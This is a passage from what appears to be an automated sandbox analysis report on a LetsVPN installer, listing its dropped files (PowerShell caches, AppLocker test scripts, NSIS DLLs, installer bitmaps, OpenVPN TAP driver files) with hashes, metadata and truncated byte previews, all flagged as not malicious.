                                                                                                                                                                                                  SHA-512:E9F534C0087182A51D5BE60E14FA992B2B933F444D32C2A2DBA3C7D4FCD6A1F418CF7A6A8B37165A61ED4D5B096716308035E117199A5B94FA796B58C041DB74
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........{HB.z..S...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1........Get-NetSwitchTeam........Add-NetSwitchTeamMember........Get-NetSwitchTeamMember........Remove-NetSwitchTeamMember........New-NetSwitchTeam........Rename-NetSwitchTeam........Remove-NetSwitchTeam..........zB.z..E...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1........Get-NetQosPolicy........Remove-Ne

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2240
                                                                                                                                                                                                  Entropy (8bit):5.380472137169455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:bylWSU4y4RQmFoUeWmfgZ9tK8NPP8m7u1iMugeC/ZPUyuE:bGLHyIFKL3IZ2KHVOug8E
                                                                                                                                                                                                  MD5:BDF39CB70643FEC01707DC4FAE488364
                                                                                                                                                                                                  SHA1:32CE3D929591CE726AD0FAABE6B9FBDF82B742DB
                                                                                                                                                                                                  SHA-256:DC65AC6CC31ACC5EC98AF9DB8B8ECFA69E1EFA7ADD069736D51A17EE45B53F5E
                                                                                                                                                                                                  SHA-512:813DE29F3BF9CF953415C94070A6F4220BE8F3828AC0E442B10AEDFF86F8A3F20FD60F31B0C246BCA9D33E6483EE4468CAE23A3872D361479DBCF1A943E3D8CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdw5fxtf.vto.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm1clttl.at5.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqf0l1et.zql.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nseyubgx.bd1.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0w0rtms.lsp.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwgfpj3u.40z.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uk2dmvhq.hyz.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcdwj0oa.gkh.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\System.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):5.804946284177748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                                                  MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                                                  SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                                                  SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                                                  SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\modern-header.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 150 x 57 x 8, image size 8666, resolution 2834 x 2834 px/m, 255 important colors, cbSize 9740, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9740
                                                                                                                                                                                                  Entropy (8bit):6.554125039233327
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:bDIK82wKywC116+rwdTKMRjwgKhww4R1jwlIHvNbmwQo8TTJG4:bv82wKywC7DrwdTKMRjwgKhwwY1jwlQq
                                                                                                                                                                                                  MD5:5ACF495828FEAE7F85E006B7774AF497
                                                                                                                                                                                                  SHA1:5D2EEF3EEBB9A72678DCCD404475341116508306
                                                                                                                                                                                                  SHA-256:6CFEBB59F0BA1B9F1E8D7AA6387F223A468EB2FF74A9ED3C3F4BB688C2B6455E
                                                                                                                                                                                                  SHA-512:D1D40C88E2167315A309005B831ACBEAB0919D5A3B1FF5AAA273DB945C8818FC2118EFDB503E4BDA055F309306E72224F54DEF0B1F0AB6F61FE4DBA66784ED68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:BM.&......2...(.......9............!..................,...788.WXX.................................................................h...;m..i...f...O...l...)J[. :G.n...p...o...%AO.....y...W.......o...........8O[.C^l...........#.....................................p...........................................................?AB.....;....+;.>...+y..4....BY.V...f...H...5bz.%DU.j...j...h...d...b...W...N...]....0<.m...Dy..3Zo.c...U...q....Pb.s...v...v...M...y...{...q...}...}.......y............+3.............g...................................Nn..Hfv.................&5=.................................................................................................................................^s~.............................................................................................................................8....Tt.G....!+..........%..................................................\gn.............................................#$%.oqs.....zz{...................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\modern-wizard.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51498, resolution 2834 x 2834 px/m, 255 important colors, cbSize 52572, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52572
                                                                                                                                                                                                  Entropy (8bit):7.144132089574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mfR2FYRtCc9X1uikvgqm+LPTTw9Bu8Skn+x23acmHjZXuxZpCAe9Crxpn319UDSQ:mf0YRt/km+b3wG0nt2UC6rOf
                                                                                                                                                                                                  MD5:7F8E1969B0874C8FB9AB44FC36575380
                                                                                                                                                                                                  SHA1:3057C9CE90A23D29F7D0854472F9F44E87B0F09A
                                                                                                                                                                                                  SHA-256:076221B4527FF13C3E1557ABBBD48B0CB8E5F7D724C6B9171C6AADADB80561DD
                                                                                                                                                                                                  SHA-512:7AA65CFADC2738C0186EF459D0F5F7F770BA0F6DA4CCD55A2CECA23627B7F13BA258136BAB88F4EEE5D9BB70ED0E8EB8BA8E1874B0280D2B08B69FC9BDD81555
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:BM\.......2...(.......:...........*.......................Y[[.....z}~.................................................5by.k...6by.m...o...p...q...9dz.s...t...w...x...`...=f{.{.......}...................~...Q...........b.......-FS.~...m...v............%+.................................................................-;B.................................................................................................................................prs.;....AY.4...(m..E...P...\...f...l...n...o...8cz.l...r...q...q...r...s...t...l...v...u...;dz.v...y...w...w...z...i...y...z...{...~...}.......W...Jw..@g|.....................]...@ey.................Go..............Ch|.<]o.............................|...@bt.9Wg.........5P_.....................................................`...c...t...q...............................................[q}.........................Rcl.....................................:....~...Ts.m........... 1;.......................................!.............+,-...........

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsDialogs.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                  Entropy (8bit):5.157714967617029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                                                                                                                                  MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                                                                                                                                  SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                                                                                                                                  SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                                                                                                                                  SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsExec.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7168
                                                                                                                                                                                                  Entropy (8bit):5.295306975422517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                                                                                                                                  MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                                                                                                                                  SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                                                                                                                                  SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                                                                                                                                  SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsProcess.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4608
                                                                                                                                                                                                  Entropy (8bit):4.703695912299512
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Sz4joMeH+Iwdf8Rom/L+rOnnk5/OCnXeAdbdOAa4GPI+CJ87eILzlq7gthwIsEQW:64c/eFdfS/SSnkxNa4G+ueqPuCtGsj
                                                                                                                                                                                                  MD5:F0438A894F3A7E01A4AAE8D1B5DD0289
                                                                                                                                                                                                  SHA1:B058E3FCFB7B550041DA16BF10D8837024C38BF6
                                                                                                                                                                                                  SHA-256:30C6C3DD3CC7FCEA6E6081CE821ADC7B2888542DAE30BF00E881C0A105EB4D11
                                                                                                                                                                                                  SHA-512:F91FCEA19CBDDF8086AFFCB63FE599DC2B36351FC81AC144F58A80A524043DDEAA3943F36C86EBAE45DD82E8FAF622EA7B7C9B776E74C54B93DF2963CFE66CC7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.I...I...I...n}f.L...I...P...@..K...@..H...@..H...RichI...........................PE..L...\..N...........!......................... ...............................`.......................................#....... ..<....@.......................P..|.................................................... ..d............................text............................... ..`.rdata....... ......................@..@.data... ....0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4C6.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4D7.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4F7.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
